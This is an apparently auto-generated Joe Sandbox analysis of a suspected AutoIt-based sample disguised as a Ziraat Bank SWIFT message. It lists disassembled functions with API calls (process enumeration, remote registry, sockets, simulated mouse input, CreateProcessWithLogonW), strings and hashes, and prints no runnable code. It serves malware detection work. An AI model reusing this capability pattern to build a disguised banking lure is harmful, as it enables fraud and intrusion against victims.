Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 0c13631c04ba7a5bbaab37984ed49672c049e424fc5dfa33b60c242749125d99
Instruction ID: 0119f60bd693103cea5b19189037ced9fb677e72b0c82aa10dd3daf2f9c7ce51
Opcode Fuzzy Hash: 0c13631c04ba7a5bbaab37984ed49672c049e424fc5dfa33b60c242749125d99
Instruction Fuzzy Hash: 06219776601219BFEB109F69DC88DBB73ECEB09360B048126F955EB152D6B0ED858760

Function 000DB80A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000DB88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000DB8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 000DB8D1

Strings

ListBox, xrefs: 000DB84D
ComboBox, xrefs: 000DB815
@U=u, xrefs: 000DB88E, 000DB8A1, 000DB8D1

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend
String ID: @U=u$ComboBox$ListBox
API String ID: 3850602802-2258501812
Opcode ID: a341cc1a35bd70fa32c9d372e4cbb3cb0b38d95ba3a8034c153a257407ad543b
Instruction ID: 6bb41ffa039790b7fb1588d918e7f8c170a45c535ef347dd589e8602e7440deb
Opcode Fuzzy Hash: a341cc1a35bd70fa32c9d372e4cbb3cb0b38d95ba3a8034c153a257407ad543b
Instruction Fuzzy Hash: 5D21E476900204FFE714ABA4DC86DFE77B8DF16350B15412AF421A72E2DB754D0AD760

Function 000E2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 000E2485
__wcsnicmp.LIBCMT ref: 000E24A6
__wcsnicmp.LIBCMT ref: 000E24C0

Strings

#notrayicon, xrefs: 000E247D
#requireadmin, xrefs: 000E24A0
#OnAutoItStartRegister, xrefs: 000E24BA

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: ca23465728916ec0f373489209ca766ac9eec0da61f86e5da84da020c4c0356f
Instruction ID: 1fd9764c8e2eb4314ac2ca4c5ad836ed6837d7198f08297f2df1770b00e79602
Opcode Fuzzy Hash: ca23465728916ec0f373489209ca766ac9eec0da61f86e5da84da020c4c0356f
Instruction Fuzzy Hash: 85210A72104A926BD330A735AD12FFB73DDEFA5310F50402AF546B7183EB659981C2A5

Function 000E0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000E09CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000E09F1
SysAllocString.OLEAUT32(00000000), ref: 000E09F4
SysAllocString.OLEAUT32 ref: 000E0A15
SysFreeString.OLEAUT32 ref: 000E0A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 000E0A38
SysAllocString.OLEAUT32(?), ref: 000E0A46

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 6b063fb2bfe9518fcd13dd7d8deb5598c356df68a91a551e1f4c75349b30a0a5
Instruction ID: 579365c2e7bf9e3ff466b358310b3a06514a5f833354dd94965bf012427d9167
Opcode Fuzzy Hash: 6b063fb2bfe9518fcd13dd7d8deb5598c356df68a91a551e1f4c75349b30a0a5
Instruction Fuzzy Hash: 1421A435200248BFDB20AFA9DC88DAA73ECEF083607048135F918DB665D6B0ECC18761

Function 000DDBBF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 000DDBD7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 000DDBF4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 000DDC2C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 000DDC52
_wcsstr.LIBCMT ref: 000DDC5C

Strings

@U=u, xrefs: 000DDBF4, 000DDC2C

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID: @U=u
API String ID: 3902887630-2594219639
Opcode ID: 4fa5b27d1e0b09c053cabc234f9d15257f7801a8228fb4719a7a35b634bec9bd
Instruction ID: 95b36560bc52ff419791a80d17f21387e9a1628aac51593a48fbb927e043c0d3
Opcode Fuzzy Hash: 4fa5b27d1e0b09c053cabc234f9d15257f7801a8228fb4719a7a35b634bec9bd
Instruction Fuzzy Hash: 6621D771214205BBEB255B39EC49EBF7BA8EF45760F10403BF909CA291EAA1DC41D6B0

Function 000DBC77 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 000DBC90
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000DBCC2
__itow.LIBCMT ref: 000DBCDA
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 000DBD00
__itow.LIBCMT ref: 000DBD11

Strings

@U=u, xrefs: 000DBC90, 000DBCC2, 000DBD00

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$__itow
String ID: @U=u
API String ID: 3379773720-2594219639
Opcode ID: 4a2b70943345ed1f13d74e96a2d69d06129cb73d9fa9b62d73a18f032399fcb9
Instruction ID: ce037c9cfc40beb7e53f1cb81239aeccfe60cc29375ee488151ca75977b8a540
Opcode Fuzzy Hash: 4a2b70943345ed1f13d74e96a2d69d06129cb73d9fa9b62d73a18f032399fcb9
Instruction Fuzzy Hash: A221CC35600704FADB20AA65DC45FDE7AA9EF5A710F111029F905EB283EB70C94547B1

Function 0010A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000BD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000BD1BA
Part of subcall function 000BD17C: GetStockObject.GDI32(00000011), ref: 000BD1CE
Part of subcall function 000BD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 000BD1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0010A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0010A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0010A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0010A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0010A360

Strings

Msctls_Progress32, xrefs: 0010A2FE

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: e8d21d2b56510ce3d3c51b2d54d3c07224a2d0a7bcc15ab21a5265dee69adeca
Instruction ID: ece68450bf93183cd18ea74c25f250bfa5ba2baafa607436e87dc31a3cc6b5f8
Opcode Fuzzy Hash: e8d21d2b56510ce3d3c51b2d54d3c07224a2d0a7bcc15ab21a5265dee69adeca
Instruction Fuzzy Hash: 5511B2B1150219BEEF255F64CC85EEB7F6DFF08798F014115FA48A60A0C7B29C21DBA4

Function 000BCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 000BCCF6
GetWindowRect.USER32(?,?), ref: 000BCD37
ScreenToClient.USER32(?,?), ref: 000BCD5F
GetClientRect.USER32(?,?), ref: 000BCE8C
GetWindowRect.USER32(?,?), ref: 000BCEA5

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 7852239ffba32688c2e9b54205758be2b8a58ed21513a666b881007bcd0263d8
Instruction ID: 649af124ad55914d3971700b7898b3aa7801000fbbc19805f5a1cd78c882873b
Opcode Fuzzy Hash: 7852239ffba32688c2e9b54205758be2b8a58ed21513a666b881007bcd0263d8
Instruction Fuzzy Hash: 8BB13C79A00249DBEF24CFA8C580BEDB7F1FF08310F149529EC69AB250DB70A951CB54

Function 00101BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00101C18
Process32FirstW.KERNEL32(00000000,?), ref: 00101C26
__wsplitpath.LIBCMT ref: 00101C54

Part of subcall function 000C1DFC: __wsplitpath_helper.LIBCMT ref: 000C1E3C

_wcscat.LIBCMT ref: 00101C69
Process32NextW.KERNEL32(00000000,?), ref: 00101CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00101CF1

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 15f8414541ca558fe89bec889e9d6b743af17529f99c10fe6ce26f9d36a6a7eb
Instruction ID: 85dddc42f0ba21052c5feb969bbc68ea16775f93a1c0eda1b6c006bf7dd59541
Opcode Fuzzy Hash: 15f8414541ca558fe89bec889e9d6b743af17529f99c10fe6ce26f9d36a6a7eb
Instruction Fuzzy Hash: C9515E71104340AFD720EF64D885EEBB7E8EF88754F00491EF58597292EB74DA45CB92

Function 00102FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00103C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00102BB5,?,?), ref: 00103C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001030AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001030EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00103112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0010313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0010317E
RegCloseKey.ADVAPI32(00000000), ref: 0010318B

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: 4f65762f9fff780b44c74adbd4d6dd56f8d6e8bf3468773407c470487f9fb2f6
Instruction ID: ba4c442b19f1cba817f38484d047067e078f787e3a88dc44d054f83493ccb78f
Opcode Fuzzy Hash: 4f65762f9fff780b44c74adbd4d6dd56f8d6e8bf3468773407c470487f9fb2f6
Instruction Fuzzy Hash: F6513831108340AFD714EFA4C885EAEBBE9FF89300F04491DF5A5972A2DB71EA15CB52

Function 001084DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00108540
GetMenuItemCount.USER32(00000000), ref: 00108577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0010859F
GetMenuItemID.USER32(?,?), ref: 0010860E
GetSubMenu.USER32(?,?), ref: 0010861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 0010866D

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 8a3dde03149292c1dedc1d0f527cdcdaba25ee682f1427b70e81e4a25fabadb6
Instruction ID: 50b02b2fbc9d9ef147ce0f4b3e6d3297ed7d779c75742522174ff99577bf8995
Opcode Fuzzy Hash: 8a3dde03149292c1dedc1d0f527cdcdaba25ee682f1427b70e81e4a25fabadb6
Instruction Fuzzy Hash: FB519D31A00614EFCF15EF98C841AEEB7F4EF48310F114469E985B7392DBB1AE418B90

Function 000E4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E4B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000E4B5B
IsMenu.USER32(00000000), ref: 000E4B7B
CreatePopupMenu.USER32 ref: 000E4BAF
GetMenuItemCount.USER32(000000FF), ref: 000E4C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 000E4C3E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 87b56e8488d2ba67ff2032916a1293979a417e61c78f0569c213f716b1bb92e5
Instruction ID: a652a15799664c9f4c03143d477a896565b7332ace07965be31d52e39f5a1bb7
Opcode Fuzzy Hash: 87b56e8488d2ba67ff2032916a1293979a417e61c78f0569c213f716b1bb92e5
Instruction Fuzzy Hash: 9B51D170601289EFDF60CF6AD888BEDBBF4AF44318F248159E425AB291D3B09945CB51

Function 000F8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0013DC00), ref: 000F8E7C
WSAGetLastError.WSOCK32(00000000), ref: 000F8E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 000F8EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 000F8EC5
_strlen.LIBCMT ref: 000F8EF7
WSAGetLastError.WSOCK32(00000000), ref: 000F8F6A

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 981184af0e5cf11bbd51b445aa713e6cb9d584c872fefb81634282c6f218e320
Instruction ID: 861d9679d53df3d98f8052ecd04e0fef5ff29e5f547b65b3a57c6f22dde230dd
Opcode Fuzzy Hash: 981184af0e5cf11bbd51b445aa713e6cb9d584c872fefb81634282c6f218e320
Instruction Fuzzy Hash: 8141C371500108AFDB14EBA4DD85EEEB7B9AF59314F108269F21697692DF30EE44DB20

Function 000BABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000BB34E: GetWindowLongW.USER32(?,000000EB), ref: 000BB35F

BeginPaint.USER32(?,?,?), ref: 000BAC2A
GetWindowRect.USER32(?,?), ref: 000BAC8E
ScreenToClient.USER32(?,?), ref: 000BACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000BACBC
EndPaint.USER32(?,?,?,?,?), ref: 000BAD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0011E673

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 51447c363149edf17a46ed3ac49e5370f60ab03283d7f89ae1b33659ef9d1a72
Instruction ID: 21e0b6671b7ddcd7e323c32f75501d2370e67e9459a9bb83d82a7f69515ab456
Opcode Fuzzy Hash: 51447c363149edf17a46ed3ac49e5370f60ab03283d7f89ae1b33659ef9d1a72
Instruction Fuzzy Hash: D941D770204300AFC720DF24DC84FFB7BE9EB5A320F180669F9A5876A1C7719885DB62

Function 000E98BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 000E98D1

Part of subcall function 000BF4EA: std::exception::exception.LIBCMT ref: 000BF51E
Part of subcall function 000BF4EA: __CxxThrowException@8.LIBCMT ref: 000BF533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 000E9908
EnterCriticalSection.KERNEL32(?), ref: 000E9924
LeaveCriticalSection.KERNEL32(?), ref: 000E999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 000E99B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 000E99D2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 516c6970fade6d79793b524844d487aac7e07547559a5fb3463a2f8c84af6e4d
Instruction ID: 989b3d3730c84c760d216ea05e2a46f3d711b74a0fefe9e82b46dca1a9d369f4
Opcode Fuzzy Hash: 516c6970fade6d79793b524844d487aac7e07547559a5fb3463a2f8c84af6e4d
Instruction Fuzzy Hash: DE317231900205EFDB14DFA9DC85EAEB7B8FF45310B1480A9F905AB256D770DE55CBA0

Function 000F9B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,000F77F4,?,?,00000000,00000001), ref: 000F9B53

Part of subcall function 000F6544: GetWindowRect.USER32(?,?), ref: 000F6557

GetDesktopWindow.USER32 ref: 000F9B7D
GetWindowRect.USER32(00000000), ref: 000F9B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 000F9BB6

Part of subcall function 000E7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000E7AD0

GetCursorPos.USER32(?), ref: 000F9BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000F9C44

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 26afe828646a1fa9dd9344bfbe38c9c9ecc3b89be8f7d9c90ffc9c87337aa5d7
Instruction ID: f4d213ca3330ae8a3ea6ed5d7efb1e8915ebb7dfa49ffadb541d2894b055c646
Opcode Fuzzy Hash: 26afe828646a1fa9dd9344bfbe38c9c9ecc3b89be8f7d9c90ffc9c87337aa5d7
Instruction Fuzzy Hash: D331C272504309AFD720DF14E849BAAB7E9FF84314F00091AF689E7182DA71E955CB92

Function 000DAF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000DAFAE
OpenProcessToken.ADVAPI32(00000000), ref: 000DAFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000DAFC4
CloseHandle.KERNEL32(00000004), ref: 000DAFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000DAFFE
